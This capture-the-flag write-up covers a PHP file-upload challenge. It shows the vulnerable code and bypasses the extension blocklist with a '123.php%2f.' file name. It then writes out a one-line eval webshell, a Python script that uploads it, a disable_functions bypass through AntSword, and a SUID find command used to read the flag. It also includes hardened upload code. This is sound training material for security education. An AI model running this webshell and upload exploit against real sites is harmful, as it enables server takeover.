[GHCTF 2024 Freshman Contest] PermissionDenied

Challenge source code

<?php
 
function blacklist($file){
    $deny_ext = array("php","php5","php4","php3","php2","php1","html","htm","phtml","pht","pHp","pHp5","pHp4","pHp3","pHp2","pHp1","Html","Htm","pHtml","jsp","jspa","jspx","jsw","jsv","jspf","jtml","jSp","jSpx","jSpa","jSw","jSv","jSpf","jHtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","aSp","aSpx","aSa","aSax","aScx","aShx","aSmx","cEr","sWf","swf","ini");
    $ext = pathinfo($file, PATHINFO_EXTENSION);
    foreach ($deny_ext as $value) {
        if (stristr($ext, $value)){
            return false;
        }
    }
    return true;
}

if(isset($_FILES['file'])){
    $filename = urldecode($_FILES['file']['name']);
    $filecontent = file_get_contents($_FILES['file']['tmp_name']);
    if(blacklist($filename)){
        file_put_contents($filename, $filecontent);
        echo "Success!!!";
    } else {
        echo "Hacker!!!";
    }
} else{
    highlight_file(__FILE__);
}

The file_put_contents function has a file-path parsing vulnerability.

When 123.php/. is uploaded, file_put_contents treats the name as a request to create a file called . inside the directory where 123.php lives, and the file that actually gets created is 123.php. The blacklist never sees the real extension: after urldecode turns %2f into /, pathinfo() extracts the extension from the basename ".", which has none, so every stristr check passes.
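As an added example (not part of the challenge or of this writeup), here is how the upload handler could be hardened so that the 123.php/. trick fails: no urldecode, a bare-file-name check, an allowlist of extensions, a server-generated file name, and move_uploaded_file() into an assumed ./uploads directory. The inline test inputs are constructed.

```php
<?php
// Added example, not the challenge code: a hardened replacement for blacklist() +
// file_put_contents(). The storage directory ./uploads and the image allowlist
// are assumptions for the demonstration.

function safe_upload_name(string $raw): ?string {
    // Do not urldecode(): the decoded "%2f" is what turned "123.php%2f." into a path.
    if ($raw === '' || strlen($raw) > 255) {
        return null;
    }
    // Reject path separators and NUL outright; the name must be a bare file name.
    if (preg_match('#[/\\\\\x00]#', $raw) || basename($raw) !== $raw) {
        return null;
    }
    // A trailing dot makes pathinfo() see no extension at all, so refuse it too.
    if (substr($raw, -1) === '.') {
        return null;
    }
    // Allowlist instead of blocklist, compared after lowercasing (so "pHp" cannot slip by).
    $allow = ['png', 'jpg', 'jpeg', 'gif'];
    $ext = strtolower(pathinfo($raw, PATHINFO_EXTENSION));
    if (!in_array($ext, $allow, true)) {
        return null;
    }
    // Never reuse the client-supplied name on disk: generate one and keep only the ext.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed inputs: the writeup's payload (raw and decoded), a plain PHP file,
// an upper-case image name and a type outside the allowlist.
foreach (['123.php%2f.', urldecode('123.php%2f.'), '123.php', 'cat.JPG', 'report.pdf'] as $c) {
    $r = safe_upload_name($c);
    printf("%-14s -> %s\n", $c, $r === null ? 'rejected' : 'accepted as ' . $r);
}

if (isset($_FILES['file']) && is_uploaded_file($_FILES['file']['tmp_name'])) {
    $name = safe_upload_name($_FILES['file']['name']);
    if ($name === null) {
        echo "Rejected";
        exit;
    }
    // move_uploaded_file() only accepts PHP's own upload temp files, unlike file_put_contents().
    if (move_uploaded_file($_FILES['file']['tmp_name'], __DIR__ . '/uploads/' . $name)) {
        echo "Stored as " . $name;
    }
}
```

Of the five constructed inputs only cat.JPG is accepted; both forms of the payload, the bare .php name and the .pdf are rejected before anything touches the disk.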

Create 1.php with the following content and put it in the same directory as the exploit script.

<?php eval($_POST[0]);phpinfo();?>

# Here 0 is the AntSword (蚁剑) connection password

Exploit script to upload the webshell

import requests

url = "http://node6.anna.nssctf.cn:23009/"  # Target URL (fill in your own challenge URL here)
file = {
    "file": ("123.php%2f.", open('1.php', 'rb'))  # File name and the opened file
}
try:
    res = requests.post(url=url, files=file)  # Send the POST request
    print(res.text)  # Print the server response
except Exception as e:
    print("发生错误:", e)

Accessing 123.php succeeds

http://node6.anna.nssctf.cn:23009/123.php

# <target URL>/123.php

Connect with AntSword

After connecting with AntSword

We can see that flag is 45b in size, so it has content, but it cannot be read: its permissions are 0740.

Permission 0740 means the file's owner can read, write and execute it, members of the owning group can only read it, and all other users have no access at all.

I tried to change the permissions, but that failed.

Let's try the terminal.

It turns out that commands cannot be executed.

Checking the phpinfo output shows that the command-execution functions are disabled.

Here we use the AntSword plugin "绕过Disable Functions" (Bypass Disable Functions) to get around this. If you don't have the plugin, configure a proxy in AntSword and download it from the AntSword plugin market.

Now commands can be executed.

I had SUID privilege escalation in mind; it is enough to pass the flag's path to the SUID binary to access the file.

find / -perm -u=s -type f 2>/dev/null

/usr/local/s3cRetTt

Flag:

NSSCTF{6daca001-e299-41b9-b407-1c6034ead189}
